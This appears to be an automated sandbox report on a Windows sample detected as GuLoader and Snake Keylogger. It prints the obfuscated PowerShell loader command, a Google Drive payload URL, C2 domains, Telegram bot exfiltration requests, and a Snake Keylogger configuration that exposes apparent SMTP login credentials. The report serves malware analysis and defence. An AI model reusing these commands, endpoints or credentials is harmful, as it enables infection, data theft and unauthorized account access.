Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HVSU7GbA5N.exe

Overview

General Information

Sample name:HVSU7GbA5N.exe
renamed because original name is a hash value
Original sample name:6370b5dcbbb9b63214f20ebf3fea952c4ddc1fdd41e2d2594dc0717bcd7f9739.exe
Analysis ID:1586021
MD5:9eeaa6c9ce625021ac21b5eb40fb73e7
SHA1:459fa22834028579136aebd1327a6ff8b6e654cb
SHA256:6370b5dcbbb9b63214f20ebf3fea952c4ddc1fdd41e2d2594dc0717bcd7f9739
Tags:exeuser-adrian__luca
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • HVSU7GbA5N.exe (PID: 7576 cmdline: "C:\Users\user\Desktop\HVSU7GbA5N.exe" MD5: 9EEAA6C9CE625021AC21B5EB40FB73E7)
    • powershell.exe (PID: 7644 cmdline: "powershell.exe" -windowstyle minimized "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 3504 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "juanantonio@autorecambiosjuanjose.com", "Password": "JA-*2020antonio", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.2665789154.0000000023071000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000002.00000002.2032574742.000000000A644000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: msiexec.exe PID: 3504JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: msiexec.exe PID: 3504JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Msiexec Initiated Connection
          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.184.238, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 3504, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49709
          Sigma detected: Potential Binary Or Script Dropper Via PowerShell
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7644, TargetFilename: C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\HVSU7GbA5N.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)" , CommandLine: "powershell.exe" -windowstyle minimized "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HVSU7GbA5N.exe", ParentImage: C:\Users\user\Desktop\HVSU7GbA5N.exe, ParentProcessId: 7576, ParentProcessName: HVSU7GbA5N.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)" , ProcessId: 7644, ProcessName: powershell.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-08T16:21:25.392730+010028033053Unknown Traffic192.168.2.849713188.114.97.3443TCP
          2025-01-08T16:21:30.188459+010028033053Unknown Traffic192.168.2.849719188.114.97.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-08T16:21:23.621820+010028032742Potentially Bad Traffic192.168.2.849711132.226.8.16980TCP
          2025-01-08T16:21:24.809363+010028032742Potentially Bad Traffic192.168.2.849711132.226.8.16980TCP
          2025-01-08T16:21:26.293753+010028032742Potentially Bad Traffic192.168.2.849714132.226.8.16980TCP
          2025-01-08T16:21:28.012490+010028032742Potentially Bad Traffic192.168.2.849716132.226.8.16980TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-08T16:21:18.656695+010028032702Potentially Bad Traffic192.168.2.849709142.250.184.238443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-08T16:21:36.997539+010018100071Potentially Bad Traffic192.168.2.849728149.154.167.220443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: http://varders.kozow.com:8081Avira URL Cloud: Label: malware
          Source: http://aborters.duckdns.org:8081Avira URL Cloud: Label: phishing
          Source: http://anotherarmy.dns.army:8081Avira URL Cloud: Label: phishing
          Found malware configuration
          Source: 00000009.00000002.2665789154.0000000023071000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "juanantonio@autorecambiosjuanjose.com", "Password": "JA-*2020antonio", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\HVSU7GbA5N.exeReversingLabs: Detection: 31%
          Multi AV Scanner detection for submitted file
          Source: HVSU7GbA5N.exeReversingLabs: Detection: 31%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

          Location Tracking

          barindex
          Tries to detect the country of the analysis system (by using the IP)
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: HVSU7GbA5N.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49712 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.8:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.8:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49728 version: TLS 1.2
          Source: HVSU7GbA5N.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: e.pdb0:lp source: powershell.exe, 00000002.00000002.2031388759.0000000008BC1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb53 source: powershell.exe, 00000002.00000002.2011151339.0000000003575000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: s\System.Core.pdbw,l source: powershell.exe, 00000002.00000002.2031388759.0000000008BC1000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeCode function: 0_2_00405EC1 FindFirstFileA,FindClose,0_2_00405EC1
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeCode function: 0_2_00402645 FindFirstFileA,0_2_00402645
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeCode function: 0_2_0040547D GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040547D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 02D5F45Dh9_2_02D5F2C0

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49728 -> 149.154.167.220:443
          Uses the Telegram API (likely for C&C communication)
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2009/01/2025%20/%2000:44:31%0D%0ACountry%20Name:%20United%20States%0D%0A[%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownDNS query: name: checkip.dyndns.org
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49716 -> 132.226.8.169:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49714 -> 132.226.8.169:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49711 -> 132.226.8.169:80
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49713 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49709 -> 142.250.184.238:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49719 -> 188.114.97.3:443
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1wmwZCb5HsLP8Yqdvke2hD-vN5VaKU3NI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1wmwZCb5HsLP8Yqdvke2hD-vN5VaKU3NI&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49712 version: TLS 1.0
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1wmwZCb5HsLP8Yqdvke2hD-vN5VaKU3NI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1wmwZCb5HsLP8Yqdvke2hD-vN5VaKU3NI&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2009/01/2025%20/%2000:44:31%0D%0ACountry%20Name:%20United%20States%0D%0A[%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: drive.google.com
          Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 08 Jan 2025 15:21:36 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: msiexec.exe, 00000009.00000002.2665789154.0000000023071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
          Source: msiexec.exe, 00000009.00000002.2665789154.0000000023071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
          Source: msiexec.exe, 00000009.00000002.2665789154.0000000023071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
          Source: msiexec.exe, 00000009.00000002.2665789154.0000000023071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: powershell.exe, 00000002.00000002.2010747235.0000000003408000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft(
          Source: HVSU7GbA5N.exe, HVSU7GbA5N.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: HVSU7GbA5N.exe, HVSU7GbA5N.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: powershell.exe, 00000002.00000002.2018085249.00000000062DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000002.00000002.2012024518.00000000053C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000002.00000002.2012024518.00000000053C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: powershell.exe, 00000002.00000002.2012024518.0000000005271000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2665789154.0000000023071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000002.00000002.2012024518.00000000053C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: msiexec.exe, 00000009.00000002.2665789154.0000000023071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
          Source: powershell.exe, 00000002.00000002.2012024518.00000000053C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000002.00000002.2030872209.0000000008B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
          Source: powershell.exe, 00000002.00000002.2030872209.0000000008B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.csU
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: powershell.exe, 00000002.00000002.2012024518.0000000005271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
          Source: powershell.exe, 00000002.00000002.2012024518.00000000053C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
          Source: msiexec.exe, 00000009.00000002.2665789154.0000000023152000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: msiexec.exe, 00000009.00000002.2665789154.0000000023152000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: msiexec.exe, 00000009.00000002.2665789154.0000000023152000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
          Source: msiexec.exe, 00000009.00000002.2665789154.0000000023152000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20a
          Source: msiexec.exe, 00000009.00000003.2131753724.00000000075EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2131692317.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: msiexec.exe, 00000009.00000002.2667049605.0000000024091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: msiexec.exe, 00000009.00000002.2665789154.000000002322E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2665789154.000000002321F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2665789154.000000002325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
          Source: msiexec.exe, 00000009.00000002.2665789154.0000000023229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
          Source: msiexec.exe, 00000009.00000002.2665789154.000000002321F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enp
          Source: powershell.exe, 00000002.00000002.2018085249.00000000062DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000002.00000002.2018085249.00000000062DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000002.00000002.2018085249.00000000062DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: msiexec.exe, 00000009.00000002.2653650551.000000000757A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
          Source: msiexec.exe, 00000009.00000002.2653650551.000000000757A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2664768454.0000000022610000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1wmwZCb5HsLP8Yqdvke2hD-vN5VaKU3NI
          Source: msiexec.exe, 00000009.00000002.2653650551.000000000757A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1wmwZCb5HsLP8Yqdvke2hD-vN5VaKU3NIN
          Source: msiexec.exe, 00000009.00000002.2653650551.00000000075E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
          Source: msiexec.exe, 00000009.00000002.2653650551.00000000075E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/#
